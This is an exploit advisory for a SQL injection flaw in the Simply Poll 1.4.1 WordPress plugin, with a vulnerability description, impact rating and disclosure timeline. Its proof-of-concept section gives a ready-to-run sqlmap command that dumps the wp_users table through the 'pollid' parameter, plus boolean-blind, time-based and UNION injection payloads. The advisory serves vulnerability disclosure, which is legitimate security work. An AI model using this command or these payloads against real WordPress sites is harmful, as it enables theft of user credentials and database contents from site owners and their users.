# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1 - Description
An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.
2. Proof of Concept
sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3
Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.
4 Impact:
Critical
5. Affected versions:
<= 1.4.1
6. Disclosure Timeline:
21-Dec-2016 found the vulnerability
21-Dec-2016 informed the developer
28-Dec-2016 release date of this security advisory
Not fixed at the date of submitting that exploit.